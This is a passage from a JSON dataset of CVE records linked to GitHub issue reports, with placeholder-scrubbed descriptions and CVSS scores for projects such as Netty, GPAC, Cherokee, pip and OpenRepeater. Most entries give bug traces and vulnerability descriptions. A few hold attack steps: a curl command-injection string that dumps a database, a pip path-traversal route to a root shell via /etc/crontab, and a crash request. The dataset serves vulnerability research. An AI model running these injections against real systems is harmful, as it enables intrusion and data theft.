  42310. "description": "Netty shouldn't allow the invalid fold.. Expected behavior Netty shouldn't allow the invalid fold. According to RFC NUMBERTAG FILETAG CODETAG A Sp or HTAB should follow the CRLF. But Netty allow a CRLF without a SP or HTAB. APITAG Actual behavior Netty accept invalid fold. This may casue http smuggling. Steps to reproduce Send a request like this: APITAG Minimal yet complete reproducer code (or URL to code) Netty version all JVM version (e.g. APITAG ) java version NUMBERTAG OS version (e.g. ERRORTAG ) Darwin APITAG APITAG NUMBERTAG Darwin Kernel Version NUMBERTAG Thu Oct NUMBERTAG PDT NUMBERTAG root:xnu APITAG NUMBERTAG",
  42311. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  42312. "severity": "CRITICAL",
  42313. "baseScore": 9.1,
  42314. "impactScore": 5.2,
  42315. "exploitabilityScore": 3.9
  42316. },
  42317. {
  42318. "CVE_ID": "CVE-2019-20445",
  42319. "Issue_Url_old": "https://github.com/netty/netty/issues/9861",
  42320. "Issue_Url_new": "https://github.com/netty/netty/issues/9861",
  42321. "Repo_new": "netty/netty",
  42322. "Issue_Created_At": "2019-12-09T18:54:41Z",
  42323. "description": "Found two security issue. Expected behavior APITAG accept one Content Length.RFC NUMBERTAG says CODETAG . APITAG accept identity and chunked Transport Encoding In this implementation, the order does not matter (it probably should). The Go implementation only uses the first value of the APITAG to be in sync with the behaviour of AWS ALB. All other valid (gzip, compress, etc.) and invalid TE will return a NUMBERTAG since we don't have readers for them I figured this was the right move, but feel free to correct me Actual behavior NUMBERTAG But netty accept all. APITAG accpet random TE. Steps to reproduce Use two CL to reproduce the first. Use a chunked TE header and a random TE header. Smiliar with NUMBERTAG URLTAG . It also cause http smuggling. Or see the other issue benoitc/gunicorn NUMBERTAG URLTAG and the PR benoitc/gunicorn NUMBERTAG URLTAG Minimal yet complete reproducer code (or URL to code) Netty version all JVM version (e.g. APITAG ) OS version (e.g. ERRORTAG )",
  42324. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  42325. "severity": "CRITICAL",
  42326. "baseScore": 9.1,
  42327. "impactScore": 5.2,
  42328. "exploitabilityScore": 3.9
  42329. },
  42330. {
  42331. "CVE_ID": "CVE-2019-20628",
  42332. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1269",
  42333. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1269",
  42334. "Repo_new": "gpac/gpac",
  42335. "Issue_Created_At": "2019-07-06T00:10:37Z",
  42336. "description": "Use After Free APITAG Hi, Our fuzzer found an UAF on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG efb0 at pc NUMBERTAG d bp NUMBERTAG ffd5d0bb3c0 sp NUMBERTAG ffd5d0bb3b0 WRITE of size NUMBERTAG at NUMBERTAG efb0 thread T NUMBERTAG c in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG f NUMBERTAG ce NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG NUMBERTAG efb0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f NUMBERTAG d NUMBERTAG d NUMBERTAG in realloc ( PATHTAG NUMBERTAG in gf_m2ts_gather_section PATHTAG previously allocated by thread T0 here NUMBERTAG f NUMBERTAG d NUMBERTAG d NUMBERTAG in malloc ( PATHTAG NUMBERTAG in gf_m2ts_gather_section PATHTAG ~~~ Thanks, Manh Dung",
  42337. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42338. "severity": "MEDIUM",
  42339. "baseScore": 5.5,
  42340. "impactScore": 3.6,
  42341. "exploitabilityScore": 1.8
  42342. },
  42343. {
  42344. "CVE_ID": "CVE-2019-20629",
  42345. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1264",
  42346. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1264",
  42347. "Repo_new": "gpac/gpac",
  42348. "Issue_Created_At": "2019-07-05T22:57:04Z",
  42349. "description": "SEGV (heap buffer overflow) on gf_m2ts_process_pmt. Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master) due to a heap buffer overflow on function gf_m2ts_process_pmt. APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG add at pc NUMBERTAG a6 bp NUMBERTAG ffd NUMBERTAG f NUMBERTAG c0 sp NUMBERTAG ffd NUMBERTAG f NUMBERTAG b0 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG add thread T NUMBERTAG a5 in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG f2f NUMBERTAG c NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  42350. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42351. "severity": "MEDIUM",
  42352. "baseScore": 5.5,
  42353. "impactScore": 3.6,
  42354. "exploitabilityScore": 1.8
  42355. },
  42356. {
  42357. "CVE_ID": "CVE-2019-20630",
  42358. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1268",
  42359. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1268",
  42360. "Repo_new": "gpac/gpac",
  42361. "Issue_Created_At": "2019-07-06T00:10:13Z",
  42362. "description": "heap buffer overflow on APITAG Hi, Our fuzzer found a buffer overflow on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG a NUMBERTAG at pc NUMBERTAG c2aa bp NUMBERTAG ffded NUMBERTAG d0 sp NUMBERTAG ffded NUMBERTAG c0 READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG a NUMBERTAG thread T NUMBERTAG c2a9 in APITAG PATHTAG NUMBERTAG c2a9 in gf_bs_read_bit PATHTAG NUMBERTAG ecc7 in gf_bs_read_double PATHTAG NUMBERTAG d in gf_odf_read_mediatime PATHTAG NUMBERTAG bb in gf_odf_parse_descriptor PATHTAG NUMBERTAG b NUMBERTAG in gf_odf_read_iod PATHTAG NUMBERTAG bb in gf_odf_parse_descriptor PATHTAG NUMBERTAG b0 in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG fe2e NUMBERTAG fa NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  42363. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42364. "severity": "MEDIUM",
  42365. "baseScore": 5.5,
  42366. "impactScore": 3.6,
  42367. "exploitabilityScore": 1.8
  42368. },
  42369. {
  42370. "CVE_ID": "CVE-2019-20631",
  42371. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1270",
  42372. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1270",
  42373. "Repo_new": "gpac/gpac",
  42374. "Issue_Created_At": "2019-07-06T00:11:01Z",
  42375. "description": "SEGV on unknown address on gf_list_count. Hi, Our fuzzer found an UAF on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG info APITAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG fff NUMBERTAG pc NUMBERTAG a NUMBERTAG d bp NUMBERTAG bfa0 sp NUMBERTAG ffe5b NUMBERTAG b0 T NUMBERTAG a NUMBERTAG c in gf_list_count PATHTAG NUMBERTAG d4 in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG ff NUMBERTAG fe NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  42376. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42377. "severity": "MEDIUM",
  42378. "baseScore": 5.5,
  42379. "impactScore": 3.6,
  42380. "exploitabilityScore": 1.8
  42381. },
  42382. {
  42383. "CVE_ID": "CVE-2019-20632",
  42384. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1271",
  42385. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1271",
  42386. "Repo_new": "gpac/gpac",
  42387. "Issue_Created_At": "2019-07-06T00:25:31Z",
  42388. "description": "SEGV on unknown addres on gf_odf_delete_descriptor. Hi, Our fuzzer found a crash on APITAG (the latest commit NUMBERTAG b on master). APITAG URLTAG Command: APITAG diso APITAG ASAN says NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG ff NUMBERTAG pc NUMBERTAG c3ef6d bp NUMBERTAG bfa0 sp NUMBERTAG fffe NUMBERTAG bf NUMBERTAG T NUMBERTAG c3ef6c in gf_odf_delete_descriptor PATHTAG NUMBERTAG f NUMBERTAG in gf_odf_del_esd PATHTAG NUMBERTAG a2e in gf_m2ts_process_pmt PATHTAG NUMBERTAG in gf_m2ts_section_complete PATHTAG NUMBERTAG fa2 in gf_m2ts_gather_section PATHTAG NUMBERTAG c in gf_m2ts_process_packet PATHTAG NUMBERTAG c in gf_m2ts_process_data PATHTAG NUMBERTAG f NUMBERTAG in gf_m2ts_probe_file PATHTAG NUMBERTAG fa9 in gf_media_import PATHTAG NUMBERTAG b NUMBERTAG in convert_file_info PATHTAG NUMBERTAG ac0c in APITAG PATHTAG NUMBERTAG f NUMBERTAG de NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG eb8 in _start ( PATHTAG ) ~~~ Thanks, Manh Dung",
  42389. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42390. "severity": "MEDIUM",
  42391. "baseScore": 5.5,
  42392. "impactScore": 3.6,
  42393. "exploitabilityScore": 1.8
  42394. },
  42395. {
  42396. "CVE_ID": "CVE-2019-20789",
  42397. "Issue_Url_old": "https://github.com/croogo/croogo/issues/940",
  42398. "Issue_Url_new": "https://github.com/croogo/croogo/issues/940",
  42399. "Repo_new": "croogo/croogo",
  42400. "Issue_Created_At": "2019-11-27T14:35:29Z",
  42401. "description": "Croogo NUMBERTAG Cms Has Multiple Stored XSS Vulnerabilities. URL\uff1a URLTAG Payload: APITAG parameter\uff1atitle FILETAG FILETAG URL: URLTAG Payload: APITAG parameter:title FILETAG FILETAG",
  42402. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  42403. "severity": "MEDIUM",
  42404. "baseScore": 4.8,
  42405. "impactScore": 2.7,
  42406. "exploitabilityScore": 1.7
  42407. },
  42408. {
  42409. "CVE_ID": "CVE-2019-20798",
  42410. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1227",
  42411. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1227",
  42412. "Repo_new": "cherokee/webserver",
  42413. "Issue_Created_At": "2019-07-25T14:44:52Z",
  42414. "description": "Reflected XSS in About page. Requested URL is improperly displayed on the About page. The problem occurs on default configuration in Cherokee and Cheroke administrator panel. XSS in administrator panel can be used to reconfigure the server and execute arbitrary commands. APITAG APITAG",
  42415. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H",
  42416. "severity": "HIGH",
  42417. "baseScore": 8.4,
  42418. "impactScore": 6.0,
  42419. "exploitabilityScore": 1.7
  42420. },
  42421. {
  42422. "CVE_ID": "CVE-2019-20799",
  42423. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1221",
  42424. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1221",
  42425. "Repo_new": "cherokee/webserver",
  42426. "Issue_Created_At": "2019-07-25T14:31:07Z",
  42427. "description": "remote null pointer dereference trigger in admin handler. It's possible to trigger NULL pointer dereference in case if request uses POST method with empty body. cherokee/handler_admin.c ERRORTAG If post body is empty then post.buf is NULL and strchr on tmp results in NULL pointer dereference. Proof of concept: curl d \"\" URLTAG test NUMBERTAG is the admin handler. ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file ERRORTAG",
  42428. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42429. "severity": "HIGH",
  42430. "baseScore": 7.5,
  42431. "impactScore": 3.6,
  42432. "exploitabilityScore": 3.9
  42433. },
  42434. {
  42435. "CVE_ID": "CVE-2019-20799",
  42436. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1222",
  42437. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1222",
  42438. "Repo_new": "cherokee/webserver",
  42439. "Issue_Created_At": "2019-07-25T14:34:23Z",
  42440. "description": "escape_with_table invalid access. cherokee/buffer.c: CODETAG in the line NUMBERTAG s is used to index is_char_escaped table. Because s is signed then we can get (negative value NUMBERTAG which results in negative value, so we access memory _before_ is_char_escaped. Simple APITAG to reproduce APITAG test8 is a handler for proxy module Patch for this issue: diff git PATHTAG PATHTAG index APITAG NUMBERTAG PATHTAG +++ PATHTAG APITAG NUMBERTAG APITAG escape_with_table (cherokee_buffer_t buffer, uint NUMBERTAG t is_char_escaped) { char t; const char s, s_next; char end; + const unsigned char s, s_next; + unsigned char end; cuint_t n_escape NUMBERTAG static char APITAG NUMBERTAG abcdef\";",
  42441. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42442. "severity": "HIGH",
  42443. "baseScore": 7.5,
  42444. "impactScore": 3.6,
  42445. "exploitabilityScore": 3.9
  42446. },
  42447. {
  42448. "CVE_ID": "CVE-2019-20799",
  42449. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1225",
  42450. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1225",
  42451. "Repo_new": "cherokee/webserver",
  42452. "Issue_Created_At": "2019-07-25T14:41:51Z",
  42453. "description": "heap buffer overflow in handler cgi. APITAG ERRORTAG ASAN ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file FILETAG",
  42454. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42455. "severity": "HIGH",
  42456. "baseScore": 7.5,
  42457. "impactScore": 3.6,
  42458. "exploitabilityScore": 3.9
  42459. },
  42460. {
  42461. "CVE_ID": "CVE-2019-20799",
  42462. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1226",
  42463. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1226",
  42464. "Repo_new": "cherokee/webserver",
  42465. "Issue_Created_At": "2019-07-25T14:44:01Z",
  42466. "description": "incorrectly used ip NUMBERTAG in proxy connection. A socket structure is incorrectly used as ip NUMBERTAG while connecting to a proxy server. APITAG APITAG ASAN ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file FILETAG",
  42467. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42468. "severity": "HIGH",
  42469. "baseScore": 7.5,
  42470. "impactScore": 3.6,
  42471. "exploitabilityScore": 3.9
  42472. },
  42473. {
  42474. "CVE_ID": "CVE-2019-20800",
  42475. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1224",
  42476. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1224",
  42477. "Repo_new": "cherokee/webserver",
  42478. "Issue_Created_At": "2019-07-25T14:37:07Z",
  42479. "description": "CGI Handler too many headers. struct cherokee_handler_cgi_t (handler_cgi.h) consist of a fixed sized array (char envp[ENV_VAR_NUM]) for environ variables. Sending a request with a lot of headers, causes to increment int envp_last to a value greater than ENV_VAR_NUM resulting in reading outside the array. handler_cgi.c: APITAG APITAG CODETAG ASAN ERRORTAG Setup: Ubuntu NUMBERTAG bit source code from github, commit APITAG build command: CODETAG files in webroot APITAG seq NUMBERTAG APITAG configuration file ERRORTAG",
  42480. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42481. "severity": "CRITICAL",
  42482. "baseScore": 9.8,
  42483. "impactScore": 5.9,
  42484. "exploitabilityScore": 3.9
  42485. },
  42486. {
  42487. "CVE_ID": "CVE-2019-20804",
  42488. "Issue_Url_old": "https://github.com/GilaCMS/gila/issues/57",
  42489. "Issue_Url_new": "https://github.com/gilacms/gila/issues/57",
  42490. "Repo_new": "gilacms/gila",
  42491. "Issue_Created_At": "2019-10-29T16:48:33Z",
  42492. "description": "XSS + CSRF Admin account takeover. Title Persistence XSS at \" URLTAG \" Description A number of factors lead to an attack that could compromise an admin user account. The following steps describe how to achieve it. First, the functionality in question is vulnerable to XSS attacks in the field responsible for changing the page header. Due to the fact that this feature does not have any anti CSRF token ( URLTAG an attack using an auto submit form containing XSS is feasible. thema in question .. as aggravating none of the admin user session tokens, they are protected with the HTTP only flag, ie they can be caught via scripting languages. POC The following two demos illustrate respectively, direct insertion via functionality, and shortly after a proof of concept using an attacker's domain site and the victim (in this case the admin) by clicking on the form containing the same request to fire and persist a XSS on your blog homepage FILETAG Attack POC FILETAG",
  42493. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  42494. "severity": "HIGH",
  42495. "baseScore": 8.8,
  42496. "impactScore": 5.9,
  42497. "exploitabilityScore": 2.8
  42498. },
  42499. {
  42500. "CVE_ID": "CVE-2019-20805",
  42501. "Issue_Url_old": "https://github.com/upx/upx/issues/317",
  42502. "Issue_Url_new": "https://github.com/upx/upx/issues/317",
  42503. "Repo_new": "upx/upx",
  42504. "Issue_Created_At": "2019-11-21T09:32:01Z",
  42505. "description": "upx devel ddos Vulnerability. ubuntu NUMBERTAG PATHTAG ddos NUMBERTAG attachment APITAG APITAG unsigned const nbucket = get_te NUMBERTAG hashtab FILETAG",
  42506. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  42507. "severity": "MEDIUM",
  42508. "baseScore": 5.5,
  42509. "impactScore": 3.6,
  42510. "exploitabilityScore": 1.8
  42511. },
  42512. {
  42513. "CVE_ID": "CVE-2019-20894",
  42514. "Issue_Url_old": "https://github.com/containous/traefik/issues/5312",
  42515. "Issue_Url_new": "https://github.com/traefik/traefik/issues/5312",
  42516. "Repo_new": "traefik/traefik",
  42517. "Issue_Created_At": "2019-09-06T13:32:38Z",
  42518. "description": "Mutual TLS verification skipped for established connection. Do you want to request a feature or report a bug ? Bug Did you try using a NUMBERTAG configuration for the version NUMBERTAG Yes [x] No What did you do? APITAG good illustration URLTAG of very related problem. I have NUMBERTAG ingress routes with APITAG provider. First service expected to have ordinary LE and https. Second service expected to be served only with mutual TLS (mtls) My k8s definitions: yaml APITAG extensions NUMBERTAG kind: Deployment metadata: name: meow spec: replicas NUMBERTAG selector: APITAG app: meow template: metadata: labels: app: meow spec: containers: name: meow image: PATHTAG ports: APITAG NUMBERTAG APITAG NUMBERTAG kind: Service metadata: name: meow svc spec: ports: port NUMBERTAG APITAG NUMBERTAG protocol: TCP name: http selector: app: meow APITAG APITAG kind: APITAG metadata: name: meow svc https spec: APITAG https routes: match: Host( APITAG ) kind: Rule services: name: meow svc port NUMBERTAG middlewares: name: test header name: passtlsclientcert tls: options: name: tls with client verification APITAG APITAG kind: APITAG metadata: name: meow svc https spec: APITAG https routes: match: Host( APITAG ) kind: Rule services: name: meow svc port NUMBERTAG middlewares: name: test header name: passtlsclientcert doesn't require TLS tls: {} APITAG APITAG kind: APITAG metadata: name: tls with client verification labels: app: traefik chart: traefik NUMBERTAG release: \"traefik\" heritage: APITAG spec: APITAG APITAG APITAG [ APITAG APITAG APITAG APITAG APITAG APITAG APITAG ] APITAG true APITAG APITAG my tls secret APITAG APITAG APITAG APITAG kind: Middleware metadata: name: passtlsclientcert spec: APITAG pem: true APITAG APITAG kind: Middleware metadata: name: test header spec: headers: APITAG X Script Name: \"added by APITAG APITAG X Custom Response Header: \"added by APITAG Testing NUMBERTAG ERRORTAG Testing NUMBERTAG I open my first service APITAG (that does not require certs) in my chrome browser and after that, I open second APITAG (that requires certs). Same behaviour with APITAG What did you expect to see? Test case NUMBERTAG ERRORTAG is Ok. Test case NUMBERTAG browser should show me ERR_BAD_SSL_CLIENT_AUTH_CERT error. Like it does in incognito for the same web page. What did you see instead? Test case NUMBERTAG ERRORTAG is Ok. Test case NUMBERTAG browser shows me page without ERR_BAD_SSL_CLIENT_AUTH_CERT error. With headers. There is not header APITAG with client certificate. Output of traefik version : APITAG version of Traefik are you using?_) CODETAG What is your environment & configuration (arguments, toml, provider, platform, ...)? CODETAG If applicable, please paste the log output in DEBUG level ( APITAG switch) ERRORTAG",
  42519. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  42520. "severity": "HIGH",
  42521. "baseScore": 7.5,
  42522. "impactScore": 3.6,
  42523. "exploitabilityScore": 3.9
  42524. },
  42525. {
  42526. "CVE_ID": "CVE-2019-20909",
  42527. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/178",
  42528. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/178",
  42529. "Repo_new": "libredwg/libredwg",
  42530. "Issue_Created_At": "2019-12-31T06:04:23Z",
  42531. "description": "Several bugs need to be fixed.. Hi, I got some bugs, and I tested on master branch and version NUMBERTAG There are NUMBERTAG heap overflow NUMBERTAG NULL pointer deference NUMBERTAG denial of service NUMBERTAG stack overflow (this bug causes memory leak in master branch) in that. Compile with ASAN and use degrewrite to repro that. Hear are some details:",
  42532. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  42533. "severity": "HIGH",
  42534. "baseScore": 7.5,
  42535. "impactScore": 3.6,
  42536. "exploitabilityScore": 3.9
  42537. },
  42538. {
  42539. "CVE_ID": "CVE-2019-20916",
  42540. "Issue_Url_old": "https://github.com/pypa/pip/issues/6413",
  42541. "Issue_Url_new": "https://github.com/pypa/pip/issues/6413",
  42542. "Repo_new": "pypa/pip",
  42543. "Issue_Created_At": "2019-04-16T17:23:55Z",
  42544. "description": "pip install APITAG allow directory traversal, leading to arbitrary file write. Environment pip version: pip NUMBERTAG Python version: Python NUMBERTAG Python NUMBERTAG OS: Ubuntu NUMBERTAG Windows NUMBERTAG Description This is a security vulnerability. when installing a remote package via a specified URL \"pip install \\ APITAG \", A malicious server (or a network APITAG if downloading over HTTP) can send a Content Disposition header with filename which contains \"../\", and pip did not sanitize the filename, join the Temporary directory and the filename as download path, which can write arbitrary file, potentially leading to command execution. issue occurs in _download_http_url in PATHTAG poc: for linux, pip usually requires root privileges, we can write following files to get root shell: PATHTAG /etc/crontab for windows, we can write a batch file to the user startup dir, lead to command execution on next boot: PATHTAG PATHTAG for malicious header: CODETAG pip install malicious url result: ERRORTAG similar issue: CVETAG",
  42545. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  42546. "severity": "HIGH",
  42547. "baseScore": 7.5,
  42548. "impactScore": 3.6,
  42549. "exploitabilityScore": 3.9
  42550. },
  42551. {
  42552. "CVE_ID": "CVE-2019-20921",
  42553. "Issue_Url_old": "https://github.com/snapappointments/bootstrap-select/issues/2199",
  42554. "Issue_Url_new": "https://github.com/snapappointments/bootstrap-select/issues/2199",
  42555. "Repo_new": "snapappointments/bootstrap-select",
  42556. "Issue_Created_At": "2019-02-14T11:10:30Z",
  42557. "description": "Escaped tags parsed as non escaped in title and data content. The bootstrap select does not respect escaped content correctly. Instead the escaped content is rendered as it would not be escaped. Sample can be seen here: URLTAG",
  42558. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  42559. "severity": "MEDIUM",
  42560. "baseScore": 6.1,
  42561. "impactScore": 2.7,
  42562. "exploitabilityScore": 2.8
  42563. },
  42564. {
  42565. "CVE_ID": "CVE-2019-20933",
  42566. "Issue_Url_old": "https://github.com/influxdata/influxdb/issues/12927",
  42567. "Issue_Url_new": "https://github.com/influxdata/influxdb/issues/12927",
  42568. "Repo_new": "influxdata/influxdb",
  42569. "Issue_Created_At": "2019-03-27T12:46:27Z",
  42570. "description": "Password bypass vulnerability. We can authorize by any user. For that we can use jwt token with empty shared_secret. It's happen because URLTAG hear we not check that APITAG is not empty string. In Authentication and authorization in APITAG document we not mention anything about APITAG variable. Also sems like we also not check exp state of token. And once generated token valid forewer.",
  42571. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42572. "severity": "CRITICAL",
  42573. "baseScore": 9.8,
  42574. "impactScore": 5.9,
  42575. "exploitabilityScore": 3.9
  42576. },
  42577. {
  42578. "CVE_ID": "CVE-2019-25010",
  42579. "Issue_Url_old": "https://github.com/rust-lang-nursery/failure/issues/336",
  42580. "Issue_Url_new": "https://github.com/rust-lang-deprecated/failure/issues/336",
  42581. "Repo_new": "rust-lang-deprecated/failure",
  42582. "Issue_Created_At": "2019-11-13T21:37:22Z",
  42583. "description": "Memory safe violation by abusing APITAG . I noticed that it is possible to cause type confusion in downcast by manually implementing APITAG . URLTAG Although the name of the function clearly shows that it is a private API, I believe a safe Rust program should not violate the memory safety guaranteed by Rust type system.",
  42584. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  42585. "severity": "CRITICAL",
  42586. "baseScore": 9.8,
  42587. "impactScore": 5.9,
  42588. "exploitabilityScore": 3.9
  42589. },
  42590. {
  42591. "CVE_ID": "CVE-2019-25011",
  42592. "Issue_Url_old": "https://github.com/netbox-community/netbox/issues/3471",
  42593. "Issue_Url_new": "https://github.com/netbox-community/netbox/issues/3471",
  42594. "Repo_new": "netbox-community/netbox",
  42595. "Issue_Created_At": "2019-08-31T09:47:44Z",
  42596. "description": "FILETAG a cve will be requested URLTAG",
  42597. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  42598. "severity": "MEDIUM",
  42599. "baseScore": 5.4,
  42600. "impactScore": 2.7,
  42601. "exploitabilityScore": 2.3
  42602. },
  42603. {
  42604. "CVE_ID": "CVE-2019-25016",
  42605. "Issue_Url_old": "https://github.com/Duncaen/OpenDoas/issues/45",
  42606. "Issue_Url_new": "https://github.com/duncaen/opendoas/issues/45",
  42607. "Repo_new": "duncaen/opendoas",
  42608. "Issue_Created_At": "2021-01-28T16:09:13Z",
  42609. "description": "APITAG keeps current PATH variable . APITAG version NUMBERTAG System: Gentoo, Debian NUMBERTAG APITAG content: APITAG _mad doas_ says that variable PATH is set to value appropriate for the target user, but current value preserves: CODETAG expected value: CODETAG",
  42610. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  42611. "severity": "HIGH",
  42612. "baseScore": 8.8,
  42613. "impactScore": 5.9,
  42614. "exploitabilityScore": 2.8
  42615. },
  42616. {
  42617. "CVE_ID": "CVE-2019-25024",
  42618. "Issue_Url_old": "https://github.com/OpenRepeater/openrepeater/issues/66",
  42619. "Issue_Url_new": "https://github.com/openrepeater/openrepeater/issues/66",
  42620. "Repo_new": "openrepeater/openrepeater",
  42621. "Issue_Created_At": "2019-03-06T21:08:00Z",
  42622. "description": "Unauthenticated Command Injection Flaw. An unauthenticated malicious actor can execute arbitrary system commands via APITAG This has a critical impact in the security of the system, for example Download system database: > $ curl PATHTAG data \"post_service=;cat PATHTAG > openrepeater.db The only limit is imagination. Regards!",
